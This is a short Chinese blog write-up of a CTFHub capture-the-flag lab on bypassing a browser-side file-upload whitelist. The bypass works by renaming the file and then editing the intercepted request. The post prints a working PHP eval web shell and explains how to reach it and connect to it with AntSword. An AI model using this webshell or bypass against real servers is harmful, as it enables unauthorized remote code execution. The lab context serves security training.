文件上传2-前端绕过(ctfhub)

一.题目链接:

https://www.ctfhub.com/#/skilltree

二.基础知识  

2.1 什么是前端绕过

  • 1:攻击者通过篡改浏览器前端的校验逻辑,绕过文件限制,将恶意文件上传到服务器的安全漏洞

三.开始解题

1.按照原来的方法进行上传,发现被限制了,我们去查看源码怎么回事

只被准许上传这些文件,我们来分析一下这串代码的重要部分

    else
    {
        //定义准许的扩展白名单
        var whitelist=new Array(".jpg",".png",".gif");
        var file_suffix=file.substring(file.lastIndexOf("."));

        //检查后缀名是否在白名单中,如果返回-1(不存在),则弹出警告并阻止上传
        if(whitelist.indexOf(file_suffix) == -1)
        {
            alert("该文件不允许上传");
            return false;
        }
    }

2.将后缀名添加jpg.利用抓包,再将后缀名删除

木马植入成功,木马playload为:<?php @eval($_POST["pass"]);?>

3.上传成功后,我们通过upload/1.php访问木马,访问成功,然后就可以用蚁剑连接了

4.连接前先进行测试,然后再用木马里的pass当密码

四.和无验证的差别

这个比无验证多了一些验证恶意文件的过滤,但显然是不够,可以通过构造合法的后缀进行绕过

posted @ 2025-04-17 11:07  sun010  阅读(94)  评论(0)    收藏  举报